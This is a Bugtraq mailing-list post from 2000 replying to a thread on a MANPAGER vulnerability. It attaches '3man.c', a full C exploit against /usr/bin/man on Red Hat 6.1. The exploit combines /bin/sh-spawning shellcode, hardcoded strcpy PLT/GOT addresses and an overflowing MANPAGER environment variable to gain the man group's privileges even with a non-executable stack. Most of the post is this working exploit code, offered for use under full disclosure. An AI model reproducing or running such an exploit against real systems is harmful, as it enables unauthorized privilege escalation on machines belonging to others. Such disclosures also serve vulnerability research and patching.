[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: man-exploit for MANPAGER environment...
From: Mariusz Woloszyn <emsi () IT ! PL>
Date: 2000-04-26 8:28:46
[Download RAW message or body]
On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:
> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
>
> - snip -
>
> /*
> * MAN-Exploit for MANPAGER environmental variable.
> * rh 6.x, tested on rh 6.1
> * written by psychoid/tCl
> * gives egid man.
> *
> * Originally discovered by lcamtuf.
> * educational. yes.
> *
> */
>
For absolutely FULL disclosure here is wonderfull man sploit (allready
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details: \
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&msg=Pine.GSO.4.03.10004201510040.12388-100000@zloty.it.com.pl).
GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.
Kil3r / Emsi / M.C.Mar /
--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland
["3man.c" (TEXT/PLAIN)]
/*
* Rewriten from:
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
* by Kil3r of Lam3rZ
* for nonexec stack environment
*
* redhat 6.1 (and others) /usr/bin/man exploit
*/
char execshell[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define STRCPY 0x80490e4 // <== strcpy() PLT entry
#define GOT 0x805038c // <== strcpy() GOT entry
#define NOP 0x90
#define BUFSIZE 4033+38
#define RET STRCPY //0x46464646
#define _BIN_SH 0xbfffffe7 // <== where we have "/bin/sh" string,
// curently useless ;)
#define SHELLCODE 0xbfffffc1
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char buf[BUFSIZE], *p;
char *env[3];
int *ap;
memset(buf,NOP,BUFSIZE);
p=buf+BUFSIZE-4;
ap=(int *)p;
*ap++ =RET;
*ap++ =GOT+4;
*ap++ =GOT+4;
*ap++ =SHELLCODE;
fprintf(stderr, "RET: 0x%x SHELLCODE: 0x%x", RET, SHELLCODE);
memcpy(buf,"MANPAGER=", 9);
env[0]=buf;
// env[1]="/bin/sh";
env[1]=execshell;
env[2]=(char *)0;
execle("/usr/bin/man", "man", "ls", 0, env); // use execle to have
// shellcode and other params at fixed addr!!!
return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic